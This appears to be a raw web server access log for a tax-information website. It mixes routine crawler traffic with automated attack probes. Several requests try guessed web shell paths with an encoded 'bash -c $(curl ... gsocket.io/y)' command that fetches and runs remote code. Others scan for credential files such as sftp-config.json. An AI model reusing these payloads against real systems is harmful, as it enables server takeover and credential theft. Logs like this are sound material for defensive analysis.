[20/Dec/2025:16:27:06 -0500] "GET /law.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:08 -0500] "GET /maul.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:09 -0500] "GET /ex.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:09 -0500] "GET /sfvul.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:10 -0500] "GET /nc4.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:10 -0500] "GET /about.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:11 -0500] "GET /wp-includes/fonts/themes.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:11 -0500] "GET /CLA.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:12 -0500] "GET /let.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:13 -0500] "GET /buy.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:13 -0500] "GET /pepe.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:14 -0500] "GET /lock1.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:15 -0500] "GET /file.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:16 -0500] "GET /classwithtostring.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:20 -0500] "GET /shlo.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:21 -0500] "GET /kwm4.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:30:58 -0500] "GET /sec.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:00 -0500] "GET /lock360.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:00 -0500] "GET /price.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:01 -0500] "GET /class20.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:02 -0500] "GET /v3.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:04 -0500] "GET /wolv.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:07 -0500] "GET /ad.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:08 -0500] "GET /bolt.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:10 -0500] "GET /acp.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:11 -0500] "GET /zwso.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:49 -0500] "GET /ext.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:50 -0500] "GET /403.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:53 -0500] "GET /npi.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:53 -0500] "GET /d4.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:56 -0500] "GET /png.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:57 -0500] "GET /lv.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:57 -0500] "GET /idea.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:58 -0500] "GET /litanies.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:26:58 -0500] "GET /file17.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:00 -0500] "GET /k.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:03 -0500] "GET /elp.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:03 -0500] "GET /amphicyon.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:04 -0500] "GET /natural.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:06 -0500] "GET /fjpeb.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:07 -0500] "GET /asd67.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:07 -0500] "GET /np.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:08 -0500] "GET /themes.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:12 -0500] "GET /yca.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:14 -0500] "GET /zse.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:15 -0500] "GET /pass.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:16 -0500] "GET /asasx.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:17 -0500] "GET /test.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:17 -0500] "GET /bluejackets.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:18 -0500] "GET /aa.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:18 -0500] "GET /ioxi-o.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:19 -0500] "GET /ucp.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:20 -0500] "GET /ask.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:20 -0500] "GET /akcc.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:27:21 -0500] "GET /gfile.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:01 -0500] "GET /asus.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:02 -0500] "GET /j.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:03 -0500] "GET /orm.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:04 -0500] "GET /xp.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:05 -0500] "GET /1.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:05 -0500] "GET /aw.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:06 -0500] "GET /nx.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:06 -0500] "GET /php.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:07 -0500] "GET /ot.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:08 -0500] "GET /ahax.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:09 -0500] "GET /wsad.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:11 -0500] "GET /just2.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:12 -0500] "GET /ea3f.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:12 -0500] "GET /Okxob.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:13 -0500] "GET /0x.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:13 -0500] "GET /v2.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:14 -0500] "GET /ay.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:17 -0500] "GET /e.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:18 -0500] "GET /wsa.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:19 -0500] "GET /readme.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:19 -0500] "GET /xpw.php HTTP/1.1" 301 795 "-" "-" 103.122.2.11 - - [20/Dec/2025:16:41:28 -0500] "GET /modules/mod_webshell/mod_webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 795 "-" "python-requests/2.32.4" 103.122.2.11 - - [20/Dec/2025:16:41:31 -0500] "GET /modules/drupal_rce/drupal_rce/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 795 "-" "python-requests/2.32.4" 103.122.2.11 - - [20/Dec/2025:16:41:33 -0500] "GET /blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 795 "-" "python-requests/2.32.4" 103.122.2.11 - - [20/Dec/2025:16:41:36 -0500] "GET /moodle/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 795 "-" "python-requests/2.32.4" 103.122.2.11 - - [20/Dec/2025:16:41:39 -0500] "GET /moodle/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 795 "-" "python-requests/2.32.4" 103.122.2.11 - - [20/Dec/2025:16:41:41 -0500] "GET /aulavirtual/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 795 "-" "python-requests/2.32.4" 103.122.2.11 - - [20/Dec/2025:16:41:47 -0500] "GET /campus/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 795 "-" "python-requests/2.32.4" 103.122.2.11 - - [20/Dec/2025:16:41:52 -0500] "GET /cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 795 "-" "python-requests/2.32.4" 103.122.2.11 - - [20/Dec/2025:16:41:55 -0500] "GET /exec.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 795 "-" "python-requests/2.32.4" 103.122.2.11 - - [20/Dec/2025:16:42:00 -0500] "GET /wp-content/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 795 "-" "python-requests/2.32.4" 52.169.163.135 - - [20/Dec/2025:16:31:14 -0500] "GET /nx9.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:15 -0500] "GET /g.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:16 -0500] "GET /1aa.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:16 -0500] "GET /z.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:18 -0500] "GET /geger.php HTTP/1.1" 301 795 "-" "-" 52.169.163.135 - - [20/Dec/2025:16:31:20 -0500] "GET /dlex.php HTTP/1.1" 301 795 "-" "-" 216.244.66.203 - - [20/Dec/2025:16:39:28 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 103.122.2.11 - - [20/Dec/2025:16:41:26 -0500] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 795 "-" "python-requests/2.32.4" 103.122.2.11 - - [20/Dec/2025:16:41:44 -0500] "GET /aulavirtual/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 795 "-" "python-requests/2.32.4" 103.122.2.11 - - [20/Dec/2025:16:41:49 -0500] "GET /campus/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 795 "-" "python-requests/2.32.4" 103.122.2.11 - - [20/Dec/2025:16:41:57 -0500] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 795 "-" "python-requests/2.32.4" 52.167.144.195 - - [20/Dec/2025:16:42:17 -0500] "GET /viewreport?id=713 HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 43.173.179.5 - - [20/Dec/2025:17:16:09 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.114 Safari/537.36" 43.173.178.59 - - [20/Dec/2025:17:16:21 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" 43.173.179.72 - - [20/Dec/2025:17:18:38 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.114 Safari/537.36" 66.249.75.234 - - [20/Dec/2025:17:34:34 -0500] "GET /ads.txt HTTP/1.1" 301 795 "-" "Google-adstxt" 43.153.12.58 - - [20/Dec/2025:17:37:58 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 216.244.66.236 - - [20/Dec/2025:17:45:48 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.236 - - [20/Dec/2025:17:45:49 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 199.244.88.226 - - [20/Dec/2025:18:09:29 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 216.244.66.203 - - [20/Dec/2025:18:10:25 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 43.135.186.135 - - [20/Dec/2025:18:30:04 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 216.244.66.236 - - [20/Dec/2025:18:30:07 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 89.132.178.27 - - [20/Dec/2025:18:57:29 -0500] "GET /admin/login HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 89.132.178.27 - - [20/Dec/2025:18:57:38 -0500] "GET /admin HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 89.132.178.27 - - [20/Dec/2025:18:58:19 -0500] "GET /admin/login HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 89.132.178.27 - - [20/Dec/2025:18:58:26 -0500] "GET /admin.php HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 89.132.178.27 - - [20/Dec/2025:18:58:41 -0500] "GET /admin/login HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 89.132.178.27 - - [20/Dec/2025:18:58:47 -0500] "GET /admin.php HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 14.215.163.132 - - [20/Dec/2025:19:00:18 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 89.132.178.27 - - [20/Dec/2025:18:57:55 -0500] "GET /admin/login HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 89.132.178.27 - - [20/Dec/2025:18:58:02 -0500] "GET /admin/login HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 14.215.163.132 - - [20/Dec/2025:19:00:18 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 206.189.183.243 - - [20/Dec/2025:19:19:04 -0500] "GET /admin/imger/venue1-islamabad-842x474-1.jpg HTTP/1.1" 301 795 "http://www.taxhelplines.com.pk/admin/imger/venue1-islamabad-842x474-1.jpg" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.3" 103.77.107.222 - - [20/Dec/2025:19:21:53 -0500] "GET /sftp-config.json HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 216.244.66.236 - - [20/Dec/2025:19:13:50 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 103.77.107.222 - - [20/Dec/2025:19:21:55 -0500] "GET /.vscode/sftp.json HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 199.244.88.225 - - [20/Dec/2025:19:28:01 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 51.68.111.202 - - [20/Dec/2025:19:46:27 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.4; http://mj12bot.com/)" 51.68.111.202 - - [20/Dec/2025:19:46:27 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.4; http://mj12bot.com/)" 216.244.66.236 - - [20/Dec/2025:19:57:16 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 40.77.167.26 - - [20/Dec/2025:19:56:19 -0500] "GET /viewjudgment?id=2185 HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 117.33.163.216 - - [20/Dec/2025:20:03:13 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 87.121.84.125 - - [20/Dec/2025:20:05:53 -0500] "GET /plugins/content/apismtp/apismtp.php?test=hello HTTP/1.1" 301 795 "-" "ALittle Client" 159.26.110.180 - - [20/Dec/2025:20:22:43 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 216.244.66.203 - - [20/Dec/2025:20:35:05 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.203 - - [20/Dec/2025:20:35:05 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.236 - - [20/Dec/2025:20:40:59 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 220.181.108.155 - - [20/Dec/2025:21:04:37 -0500] "GET /news?page=9 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" 119.249.100.112 - - [20/Dec/2025:21:04:38 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" 119.249.100.109 - - [20/Dec/2025:21:04:54 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" 216.244.66.203 - - [20/Dec/2025:21:23:50 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.236 - - [20/Dec/2025:21:24:30 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.236 - - [20/Dec/2025:21:24:30 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 150.109.46.88 - - [20/Dec/2025:21:43:42 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 66.249.75.234 - - [20/Dec/2025:21:34:34 -0500] "GET /ads.txt HTTP/1.1" 301 795 "-" "Google-adstxt" 66.249.77.77 - - [20/Dec/2025:22:03:46 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.69.103 - - [20/Dec/2025:22:03:53 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.69.104 - - [20/Dec/2025:22:03:54 -0500] "GET /ads.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 216.244.66.236 - - [20/Dec/2025:22:10:09 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.236 - - [20/Dec/2025:22:10:09 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 66.249.77.75 - - [20/Dec/2025:22:03:47 -0500] "GET /ads.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 216.244.66.236 - - [20/Dec/2025:22:10:09 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 43.156.204.134 - - [20/Dec/2025:22:15:19 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 49.51.72.236 - - [20/Dec/2025:22:13:09 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 66.249.75.236 - - [20/Dec/2025:22:18:15 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 106.75.23.243 - - [20/Dec/2025:22:34:03 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" 167.71.232.93 - - [20/Dec/2025:22:36:10 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0" 167.71.232.93 - - [20/Dec/2025:22:36:10 -0500] "GET /favicon.ico HTTP/1.1" 301 795 "http://www.taxhelplines.com.pk/" "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0" 106.75.23.243 - - [20/Dec/2025:22:37:03 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" 57.141.16.80 - - [20/Dec/2025:22:39:09 -0500] "GET /admin/imger/ HTTP/1.1" 301 795 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" 185.11.61.87 - - [20/Dec/2025:22:52:01 -0500] "GET / HTTP/1.0" 301 795 "http://customshelpline.com.pk/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" 173.252.87.16 - - [20/Dec/2025:22:47:32 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 216.244.66.236 - - [20/Dec/2025:22:55:25 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.236 - - [20/Dec/2025:22:55:25 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 52.167.144.230 - - [20/Dec/2025:23:04:22 -0500] "GET /viewjudgment?id=3627 HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 87.121.84.125 - - [20/Dec/2025:23:18:00 -0500] "GET /plugins/content/apismtp/apismtp.php?test=hello HTTP/1.1" 301 795 "-" "ALittle Client" 43.153.36.110 - - [20/Dec/2025:23:22:08 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 43.173.180.207 - - [20/Dec/2025:23:16:50 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.114 Safari/537.36" 43.173.173.165 - - [20/Dec/2025:23:17:01 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 